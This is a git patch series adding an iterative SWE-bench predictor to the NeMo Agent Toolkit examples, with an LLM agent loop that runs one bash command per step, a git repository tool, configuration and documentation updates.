From 658a8f9e76e8bae9471a62e3be91d04458f34c34 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 14 Jan 2026 12:15:41 -0800 Subject: [PATCH 01/22] feat(swe-bench): implement iterative predictor for SWE-bench - Add IterativeAgent - Add config_iterative.yml - Add git tools - Add SweBenchPredictorIterativeConfig - Register iterative predictor and git tool - Update README.md Signed-off-by: Jerry Guan --- .../swe_bench/README.md | 1 + .../swe_bench/src/nat_swe_bench/config.py | 18 +- .../configs/config_iterative.yml | 71 +++ .../predictors/predict_iterative/__init__.py | 0 .../predict_iterative/predict_iterative.py | 504 ++++++++++++++++++ .../predict_iterative/tools/__init__.py | 0 .../predict_iterative/tools/git_tool.py | 85 +++ .../predict_iterative/tools/register.py | 60 +++ .../src/nat_swe_bench/predictors/register.py | 1 + .../src/nat_swe_bench/register_tools.py | 1 + 10 files changed, 735 insertions(+), 6 deletions(-) create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py create mode 100644 examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py diff --git a/examples/evaluation_and_profiling/swe_bench/README.md b/examples/evaluation_and_profiling/swe_bench/README.md index 155cbcddbb..8118518146 100644 --- a/examples/evaluation_and_profiling/swe_bench/README.md +++ b/examples/evaluation_and_profiling/swe_bench/README.md @@ -159,6 +159,7 @@ That information 
is only used for evaluation. Using it can taint the predictor a These predictors are provided in this NeMo Agent Toolkit example: - `gold` - Uses the patch from the `SWEBenchInput` instance, bypassing problem-solving logic. See [predict_gold_stub.py](src/nat_swe_bench/predictors/predict_gold/predict_gold_stub.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_gold.yml`. - `skeleton` - Skeleton code for creating a problem-solving workflow. This code can be copied to create a net-new predictor. See [predict_skeleton.py](src/nat_swe_bench/predictors/predict_skeleton/predict_skeleton.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_skeleton.yml`. +- `iterative` - Iterative agent that solves problems by executing bash commands step-by-step, observing results, and generating patches. See [predict_iterative.py](src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py) and configuration file `examples/evaluation_and_profiling/swe_bench/configs/config_iterative.yml`. 
### Adding a net new predictor To add a new predictor: diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py index d6f5b60a67..11b6c1219c 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py @@ -16,10 +16,13 @@ import typing from pydantic import Discriminator +from pydantic import Field from pydantic import Tag from nat.data_models.common import BaseModelRegistryTag from nat.data_models.common import TypedBaseModel +from nat.data_models.component_ref import FunctionRef +from nat.data_models.component_ref import LLMRef from nat.data_models.function import FunctionBaseConfig @@ -34,13 +37,16 @@ class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"): class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"): verbose: bool = False +class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + llm_name: LLMRef = Field(description="LLM to use for iterative agent") + step_limit: int = Field(default=250, description="Maximum number of agent steps") + timeout: int = Field(default=60, description="Command execution timeout in seconds") -SweBenchPredictorConfig = typing.Annotated[typing.Annotated[SweBenchPredictorGoldConfig, - Tag(SweBenchPredictorGoldConfig.static_type())] - | typing.Annotated[SweBenchPredictorSkeletonConfig, - Tag(SweBenchPredictorSkeletonConfig.static_type())], - Discriminator(TypedBaseModel.discriminator)] - +SweBenchPredictorConfig = typing.Annotated[ + typing.Annotated[SweBenchPredictorGoldConfig, Tag(SweBenchPredictorGoldConfig.static_type())] + | typing.Annotated[SweBenchPredictorSkeletonConfig, Tag(SweBenchPredictorSkeletonConfig.static_type())] + | typing.Annotated[SweBenchPredictorIterativeConfig, Tag(SweBenchPredictorIterativeConfig.static_type())], + 
Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml new file mode 100644 index 0000000000..21fa4f7ee0 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -0,0 +1,71 @@ +llms: + claude_sonnet_llm: + _type: litellm + model_name: anthropic/claude-sonnet-4-5-20250929 + temperature: 0.0 + api_key: "${ANTHROPIC_API_KEY}" # Set this environment variable before running + +# llms: +# openai_llm: +# _type: litellm +# model_name: openai/gpt-5.2 +# temperature: 0.0 +# api_key: "${OPENAI_API_KEY}" # Set this environment variable before running + + +# llms: +# nim_llm: +# _type: nim +# model_name: meta/llama-3.3-70b-instruct +# temperature: 0.6 +# max_tokens: 4096 + +workflow: + _type: swe_bench + predictor: + _type: iterative + llm_name: "claude_sonnet_llm" + step_limit: 250 + timeout: 60 + +functions: + git_repo_tool: + _type: git_repo_tool + workspace_dir: "./.workspace" + cleanup_on_exit: true + +eval: + general: + output_dir: .tmp/nat/examples/evaluation_and_profiling/swe_bench/iterative/ + max_concurrency: 1 + dataset: + _type: parquet + file_path: hf://datasets/princeton-nlp/SWE-bench_Lite/data/test-00000-of-00001.parquet + id_key: instance_id + structure: + disable: true + filter: + allowlist: + field: + instance_id: + - sympy__sympy-20590 + #- sympy__sympy-21055 + #- sympy__sympy-11400 + #- sympy__sympy-11870 + #- astropy__astropy-12907 + #- astropy__astropy-6938 + #- django__django-15781 + #- django__django-11001 + #- matplotlib__matplotlib-25332 + #- mwaskom__seaborn-3010 + #- pallets__flask-4045 + #- psf__requests-1963 + #- pydata__xarray-3364 + + evaluators: + swe_bench: + _type: swe_bench + run_id: nat_iterative_1 + 
clean: true + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py new file mode 100644 index 0000000000..19a980c4b1 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/predict_iterative.py @@ -0,0 +1,504 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Iterative agent-based predictor for SWE-bench problems. + +This predictor implements a step-by-step approach where the agent: +1. Receives a problem statement +2. Executes bash commands iteratively +3. Observes results and adjusts strategy +4. Generates patch using git diff + +The iterative loop and prompts are inspired by mini-swe-agent, adapted for the NAT framework. 
+""" + +import asyncio +import json +import logging +import re +import subprocess +from dataclasses import dataclass +from pathlib import Path + +from langchain_core.messages import AIMessage, HumanMessage, SystemMessage +from rich.console import Console + +from nat.builder.builder import Builder +from nat.builder.framework_enum import LLMFrameworkEnum +from nat.data_models.swe_bench_model import SWEBenchInput + +from nat_swe_bench.config import SweBenchWorkflowConfig +from nat_swe_bench.predictors.predict_abc import SweBenchPredictorBase +from nat_swe_bench.predictors.predictor_registry import register_predictor + +logger = logging.getLogger(__name__) + +console = Console(highlight=False) + + +class NonTerminatingException(Exception): + """Raised for conditions that can be handled by the agent.""" + + +class TerminatingException(Exception): + """Raised for conditions that terminate the agent.""" + + +class FormatError(NonTerminatingException): + """Raised when the LLM's output is not in the expected format.""" + + +class ExecutionTimeoutError(NonTerminatingException): + """Raised when the action execution timed out.""" + + +class Submitted(TerminatingException): + """Raised when the agent has finished its task.""" + + +class LimitsExceeded(TerminatingException): + """Raised when the agent has reached its step limit.""" + + +@dataclass +class IterativeAgentConfig: + """Configuration for the iterative agent.""" + step_limit: int = 250 + timeout: int = 60 + max_output_length: int = 10000 + + +class IterativeAgent: + """Iterative agent that executes commands step-by-step.""" + + # Timeout message template + _TIMEOUT_TEMPLATE = ( + "The last command {action} timed out and has been killed.\n" + "The output of the command was:\n \n{output}\n\n" + "Please try another command and make sure to avoid those requiring interactive input." 
+ ) + + # Output truncation warning message + _OUTPUT_TRUNCATION_WARNING = ( + "\n\n" + "The output of your last command was too long.\n" + "Please try a different command that produces less output.\n" + "If you're looking at a file you can try use head, tail or sed to view a smaller number of lines selectively.\n" + "If you're using grep or find and it produced too much output, you can use a more selective search pattern.\n" + "If you really need to see something from the full command's output, you can redirect output to a file and then search in that file.\n" + "\n\n" + ) + + def __init__(self, llm, repo_path: Path, config: IterativeAgentConfig): + self.llm = llm + self.repo_path = repo_path + self.config = config + self.messages: list = [] + self.n_steps = 0 + + def add_message(self, role: str, content: str): + """Add a message to the conversation and print it for debugging.""" + if role == "system": + msg = SystemMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold blue]System[/bold blue] (step {self.n_steps}):\n", end="", highlight=False) + elif role == "user" or role == "human": + msg = HumanMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold green]User[/bold green] (step {self.n_steps}):\n", end="", highlight=False) + elif role == "assistant" or role == "ai": + msg = AIMessage(content=content) + self.messages.append(msg) + console.print(f"\n[bold red]Assistant[/bold red] (step {self.n_steps}):\n", end="", highlight=False) + else: + raise ValueError(f"Unknown role: {role}") + + # Print content + console.print(content, highlight=False, markup=False) + + def _build_prompts(self, task: str, repo_path: Path) -> tuple[str, str]: + """Build system and instance prompts customized for SWE-bench. 
+ + Args: + task: The task description/PR description + repo_path: Path to the repository being worked on + """ + # Convert Path to string for template usage + repo_path_str = str(repo_path) + + system_template = """You are a helpful assistant that can interact multiple times with a computer shell to solve programming tasks. +Your response must contain exactly ONE bash code block with ONE command (or commands connected with && or ||). + +Include a THOUGHT section before your command where you explain your reasoning process. +Format your response as shown in . + + +THOUGHT: Your reasoning and analysis here + +```bash +your_command_here +``` + + +Failure to follow these rules will cause your response to be rejected.""" + + instance_template = f""" +Consider the following PR description: +{task} + + + +# Task Instructions + +## Overview +You're a software engineer interacting continuously with a computer by submitting commands. +You'll be helping implement necessary changes to meet requirements in the PR description. +Your task is specifically to make changes to non-test files in the current directory in order to fix the issue described in the PR description in a way that is general and consistent with the codebase. + +IMPORTANT: This is an interactive process where you will think and issue ONE command, see its result, then think and issue your next command. + +For each response: +1. Include a THOUGHT section explaining your reasoning and what you're trying to accomplish +2. Provide exactly ONE bash command to execute + +## Important Boundaries +- MODIFY: Regular source code files in {repo_path_str} (this is the working directory for all your subsequent commands) +- DO NOT MODIFY: Tests, configuration files (pyproject.toml, setup.cfg, etc.) + +## Recommended Workflow +1. Analyze the codebase by finding and reading relevant files +2. Create a script to reproduce the issue +3. Edit the source code to resolve the issue +4. 
Verify your fix works by running your script again +5. Test edge cases to ensure your fix is robust +6. Clean up any temporary files you created (test scripts, plans, summaries, etc.) + +## Command Execution Rules +You are operating in an environment where +1. You write a single command +2. The system executes that command in a subshell +3. You see the result +4. You write your next command + +Each response should include: +1. A **THOUGHT** section where you explain your reasoning and plan +2. A single bash code block with your command + +Format your responses like this: + + +THOUGHT: Here I explain my reasoning process, analysis of the current situation, +and what I'm trying to accomplish with the command below. + +```bash +your_command_here +``` + + +Commands must be specified in a single bash code block: + +```bash +your_command_here +``` + +**CRITICAL REQUIREMENTS:** +- Your response SHOULD include a THOUGHT section explaining your reasoning +- Your response MUST include EXACTLY ONE bash code block +- This bash block MUST contain EXACTLY ONE command (or a set of commands connected with && or ||) +- If you include zero or multiple bash blocks, or no command at all, YOUR RESPONSE WILL FAIL +- Do NOT try to run multiple independent commands in separate blocks in one response +- Directory or environment variable changes are not persistent. Every action is executed in a new subshell. +- However, you can prefix any action with `MY_ENV_VAR=MY_VALUE cd /path/to/working/dir && ...` or write/load environment variables from files + +Example of a CORRECT response: + +THOUGHT: I need to understand the structure of the repository first. Let me check what files are in the current directory to get a better understanding of the codebase. + +```bash +ls -la +``` + + +Example of an INCORRECT response: + +THOUGHT: I need to examine the codebase and then look at a specific file. I'll run multiple commands to do this. 
+ +```bash +ls -la +``` + +Now I'll read the file: + +```bash +cat file.txt +``` + + +If you need to run multiple commands, either: +1. Combine them in one block using && or || +```bash +command1 && command2 || echo "Error occurred" +``` + +2. Wait for the first command to complete, see its output, then issue the next command in your following response. + +## Environment Details +- You have a full Linux shell environment +- Always use non-interactive flags (-y, -f) for commands +- Avoid interactive tools like vi, nano, or any that require user input +- If a command isn't available, you can install it + +## Useful Command Examples + +### Create a new file: +```bash +cat <<'EOF' > newfile.py +import numpy as np +hello = "world" +print(hello) +EOF +``` + +### Edit files with sed: +```bash +# Replace all occurrences +sed -i 's/old_string/new_string/g' filename.py + +# Replace only first occurrence +sed -i 's/old_string/new_string/' filename.py + +# Replace first occurrence on line 1 +sed -i '1s/old_string/new_string/' filename.py + +# Replace all occurrences in lines 1-10 +sed -i '1,10s/old_string/new_string/g' filename.py +``` + +### View file content: +```bash +# View specific lines with numbers +nl -ba filename.py | sed -n '10,20p' +``` + +### Any other command you want to run +```bash +anything +``` + +## Submission +When you've completed your work (reading, editing, testing), and cannot make further progress +issue exactly the following command: + +```bash +echo COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT && git add -A && git diff --cached +``` + +This command will submit your work. +You cannot continue working (reading, editing, testing) in any way on this task after submitting. 
+""" + + return system_template, instance_template + + async def run(self, task: str) -> tuple[str, str]: + """Run the iterative agent loop until completion.""" + system_template, instance_template = self._build_prompts(task, self.repo_path) + + self.messages = [] + self.add_message("system", system_template) + self.add_message("user", instance_template) + + while True: + try: + # Check limits + if 0 < self.config.step_limit <= self.n_steps: + raise LimitsExceeded(f"Reached step limit: {self.config.step_limit}") + + self.n_steps += 1 + + response = await self._query_llm() + observation = await self._execute_action(response) + + # Check if completed + if "COMPLETE_TASK_AND_SUBMIT_FINAL_OUTPUT" in observation: + # Extract patch from git diff output + patch_lines = observation.split("\n", 1) + if len(patch_lines) > 1: + patch = patch_lines[1] + raise Submitted(patch) + raise Submitted(observation) + + self.add_message("user", f"Observation:\n{observation}") + + except NonTerminatingException as e: + # Recoverable errors: add error message and continue + self.add_message("user", str(e)) + except TerminatingException as e: + # Terminal errors: add error message and return + self.add_message("user", str(e)) + return type(e).__name__, str(e) + + async def _query_llm(self) -> str: + """Query LLM and return response content.""" + try: + response = await self.llm.ainvoke(self.messages) + content = response.content if hasattr(response, 'content') else str(response) + self.add_message("assistant", content) + return content + except Exception as e: + logger.error("LLM invocation failed: %s", e, exc_info=True) + # recoverable error, let the agent continue + raise NonTerminatingException(f"LLM call failed: {str(e)}") + + async def _execute_action(self, response: str) -> str: + """Parse action from response and execute it asynchronously.""" + # Extract bash command from response + action_regex = r"```bash\s*\n(.*?)\n```" + matches = re.findall(action_regex, response, re.DOTALL) + 
if len(matches) != 1: + error_msg = f"Expected exactly one bash command, found {len(matches)}" + raise FormatError(error_msg) + + command = matches[0].strip() + + # Execute command using asyncio.to_thread to avoid blocking + def run_cmd(): + """Synchronous command execution function.""" + return subprocess.run( + command, + shell=True, + cwd=str(self.repo_path), + timeout=self.config.timeout, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, # stderr redirected to stdout + text=True, + encoding="utf-8", + errors="replace" + ) + + try: + result = await asyncio.to_thread(run_cmd) + + # stderr is automatically redirected to stdout via stderr=subprocess.STDOUT + output = result.stdout if result.stdout else "" + + # Include returncode in the output so agent know action success or fail + output = f"{result.returncode}\n{output}" + + # Truncate long outputs + max_length = self.config.max_output_length + if len(output) > max_length: + elided_chars = len(output) - max_length + head_tail_length = max_length // 2 + output = ( + f"{output[:head_tail_length]}\n" + f"\n{elided_chars} characters elided\n\n" + f"{output[-head_tail_length:]}" + ) + output = self._OUTPUT_TRUNCATION_WARNING + output + + return output + + except (TimeoutError, subprocess.TimeoutExpired) as e: + # Extract output from exception if available (only subprocess.TimeoutExpired has output attribute) + if isinstance(e, subprocess.TimeoutExpired) and hasattr(e, "output") and e.output: + output = e.output.decode("utf-8", errors="replace") + else: + output = "" + # Format timeout message using template + timeout_message = self._TIMEOUT_TEMPLATE.format( + action=command, + output=output + ) + raise ExecutionTimeoutError(timeout_message) + except Exception as e: + raise NonTerminatingException(f"Error executing command: {str(e)}") + + +@register_predictor("iterative") +class SweBenchPredictor(SweBenchPredictorBase): + """Iterative agent-based predictor for SWE-bench.""" + + def __init__(self, config: 
SweBenchWorkflowConfig, builder: Builder): + super().__init__(config, builder) + self.git_tool = None + + async def predict_fn(self, swebench_input: SWEBenchInput) -> str: + """Generate patch using iterative agent approach.""" + logger.info("Processing instance %s with iterative agent", swebench_input.instance_id) + + # Setup repository + if self.git_tool is None: + self.git_tool = await self.builder.get_tool( + "git_repo_tool", + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + repo_name = swebench_input.instance_id.split('-')[0] + org, repo = repo_name.split('__') + repo_url = f"https://github.com/{org}/{repo}" + + # Setup repo + try: + repo_path_str = await self.git_tool.arun(json.dumps({ + "operation": "setup", + "repo_url": repo_url, + "base_commit": swebench_input.base_commit + })) + repo_path = Path(repo_path_str) + logger.info("Repository setup at %s", repo_path) + except Exception as e: + logger.exception("Failed to setup repository: %s", e) + return f"Error: Failed to setup repository - {str(e)}" + + try: + # Get LLM + llm = await self.builder.get_llm( + self.config.predictor.llm_name, + wrapper_type=LLMFrameworkEnum.LANGCHAIN + ) + + # Build task description + task = self._build_task_description(swebench_input) + + # Create agent config + agent_config = IterativeAgentConfig( + step_limit=getattr(self.config.predictor, 'step_limit', 250), + timeout=getattr(self.config.predictor, 'timeout', 60) + ) + + # Run iterative agent + agent = IterativeAgent(llm, repo_path, agent_config) + exit_status, patch = await agent.run(task) + + if exit_status == "Submitted": + logger.info("Agent completed successfully with patch") + return patch + else: + logger.warning(f"Agent exited with status: {exit_status}, result: {patch[:200] if patch else 'None'}") + return f"Error: {exit_status} - {patch}" + + except Exception as e: + logger.exception(f"Error processing {swebench_input.instance_id}: {e}") + return f"Error: {str(e)}" + + def _build_task_description(self, 
swebench_input: SWEBenchInput) -> str: + """Build task description from SWE-bench input.""" + parts = [swebench_input.problem_statement] + if swebench_input.hints_text: + parts.append(f"\nAdditional Context:\n{swebench_input.hints_text}") + return "\n".join(parts) + + diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py new file mode 100644 index 0000000000..62ed3db61f --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/git_tool.py @@ -0,0 +1,85 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import logging +from dataclasses import dataclass +from pathlib import Path + +from git import Repo + +logger = logging.getLogger(__name__) + + +@dataclass +class RepoContext: + """Context manager for repository operations.""" + repo_url: str + base_path: Path + repo: Repo | None = None + + def __post_init__(self): + self.repo_name = self.repo_url.split('/')[-1].replace('.git', '') + self.repo_path = self.base_path / self.repo_name + + +class RepoManager: + + def __init__(self, workspace_dir: str): + self.workspace = Path(workspace_dir) + self.workspace.mkdir(parents=True, exist_ok=True) + self.active_repos = {} + + async def setup_repository(self, repo_url: str, base_commit: str) -> RepoContext: + """Setup a repository at a specific commit.""" + repo_path = get_repo_path(str(self.workspace), repo_url) + + if str(repo_path) in self.active_repos: + context = self.active_repos[str(repo_path)] + await checkout_commit(context.repo, base_commit) + return context + + repo = await clone_repository(repo_url, repo_path) + await checkout_commit(repo, base_commit) + + context = RepoContext(repo_url=repo_url, base_path=self.workspace, repo=repo) + self.active_repos[str(repo_path)] = context + return context + + async def cleanup(self): + """Clean up all managed repositories.""" + import shutil + for repo_path_str in list(self.active_repos.keys()): + repo_path = Path(repo_path_str) + if repo_path.exists(): + shutil.rmtree(repo_path) + self.active_repos.clear() + + +def get_repo_path(workspace_dir: str, repo_url: str) -> Path: + """Generate a unique path for the repository.""" + repo_name = repo_url.split('/')[-1].replace('.git', '') + return Path(workspace_dir) / repo_name + + +async def clone_repository(repo_url: str, target_path: Path) -> Repo: + """Clone a repository to the specified path.""" + logger.info("Cloning repository %s to %s", repo_url, target_path) + return Repo.clone_from(repo_url, target_path) + + +async def checkout_commit(repo: Repo, commit_hash: str): + 
"""Checkout a specific commit in the repository.""" + logger.info("Checking out commit %s", commit_hash) + repo.git.checkout(commit_hash) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py new file mode 100644 index 0000000000..f4b5220264 --- /dev/null +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/predict_iterative/tools/register.py @@ -0,0 +1,60 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# Register all the tools needed by the full predictor without loading the dependencies. 
+import typing + +from nat.builder.builder import Builder +from nat.builder.function_info import FunctionInfo +from nat.cli.register_workflow import register_function +from nat.data_models.function import FunctionBaseConfig + + +class GitRepoToolConfig(FunctionBaseConfig, name="git_repo_tool"): + """Configuration for git repository management tool.""" + _type: typing.Literal["git_repo_tool"] = "git_repo_tool" + workspace_dir: str = "./.workspace" # Base directory for cloning repositories + cleanup_on_exit: bool = True # Whether to clean up repos after use + + +@register_function(config_type=GitRepoToolConfig) +async def git_repo_tool(tool_config: GitRepoToolConfig, builder: Builder): + """Git repository management tool for SWE Bench.""" + import json + + from .git_tool import RepoManager + repo_manager = RepoManager(tool_config.workspace_dir) + + # Simple async function that accepts a JSON string + async def git_operations(args_str: str) -> str: + args = json.loads(args_str) + operation = args.get('operation') + + if operation == "setup": + context = await repo_manager.setup_repository(args['repo_url'], args['base_commit']) + return str(context.repo_path) + + if operation == "cleanup": + await repo_manager.cleanup() + return "Cleanup complete" + + raise ValueError(f"Unknown operation: {operation}") + + try: + yield FunctionInfo.from_fn(git_operations, + description="Git repository management tool that accepts JSON string arguments") + finally: + if tool_config.cleanup_on_exit: + await repo_manager.cleanup() diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py index 61e8f1a469..afa1861eea 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/predictors/register.py @@ -17,3 +17,4 @@ # Import the predictor classes to register 
them from nat_swe_bench.predictors.predict_gold.predict_gold_stub import SweBenchPredictor as GoldPredictor +from nat_swe_bench.predictors.predict_iterative.predict_iterative import SweBenchPredictor as IterativePredictor diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py index ef10ebc8aa..7ef908ebf8 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/register_tools.py @@ -16,3 +16,4 @@ # flake8: noqa: F401, pylint: disable=unused-import # imports tools to register them +from nat_swe_bench.predictors.predict_iterative.tools.register import git_repo_tool From 2395ac49999eb51741835495ce16ccf2bed50876 Mon Sep 17 00:00:00 2001 From: Jerry Guan Date: Wed, 14 Jan 2026 22:07:12 -0800 Subject: [PATCH 02/22] fix CI warnings when PR Signed-off-by: Jerry Guan --- .../swe_bench/src/nat_swe_bench/config.py | 24 ++++++++- .../configs/config_iterative.yml | 51 +++++++++++-------- .../predict_iterative/tools/git_tool.py | 17 +++++-- .../predict_iterative/tools/register.py | 12 +++-- 4 files changed, 75 insertions(+), 29 deletions(-) diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py index 11b6c1219c..7352d9ade7 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/config.py @@ -21,23 +21,40 @@ from nat.data_models.common import BaseModelRegistryTag from nat.data_models.common import TypedBaseModel -from nat.data_models.component_ref import FunctionRef from nat.data_models.component_ref import LLMRef from nat.data_models.function import FunctionBaseConfig class SweBenchPredictorBaseConfig(TypedBaseModel, BaseModelRegistryTag): + """Base configuration 
class for SWE-bench predictors.""" description: str = "Swe Bench Problem Solver" class SweBenchPredictorGoldConfig(SweBenchPredictorBaseConfig, name="gold"): + """Configuration for the gold predictor that uses the provided patch directly. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = True class SweBenchPredictorSkeletonConfig(SweBenchPredictorBaseConfig, name="skeleton"): + """Configuration for the skeleton predictor template. + + Attributes: + verbose: Whether to enable verbose output for debugging. + """ verbose: bool = False class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterative"): + """Configuration for the iterative predictor that solves problems step-by-step. + + Attributes: + llm_name: Reference to the LLM to use for iterative problem solving. + step_limit: Maximum number of agent steps before termination. + timeout: Command execution timeout in seconds. + """ llm_name: LLMRef = Field(description="LLM to use for iterative agent") step_limit: int = Field(default=250, description="Maximum number of agent steps") timeout: int = Field(default=60, description="Command execution timeout in seconds") @@ -49,4 +66,9 @@ class SweBenchPredictorIterativeConfig(SweBenchPredictorBaseConfig, name="iterat Discriminator(TypedBaseModel.discriminator)] class SweBenchWorkflowConfig(FunctionBaseConfig, name="swe_bench"): + """Configuration for the SWE-bench workflow. + + Attributes: + predictor: The predictor configuration (gold, skeleton, or iterative). 
+ """ predictor: SweBenchPredictorConfig diff --git a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml index 21fa4f7ee0..91fd997fb7 100644 --- a/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml +++ b/examples/evaluation_and_profiling/swe_bench/src/nat_swe_bench/configs/config_iterative.yml @@ -1,3 +1,25 @@ +# SPDX-FileCopyrightText: Copyright (c) 2025-2026, NVIDIA CORPORATION & AFFILIATES. All rights reserved. +# SPDX-License-Identifier: Apache-2.0 +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
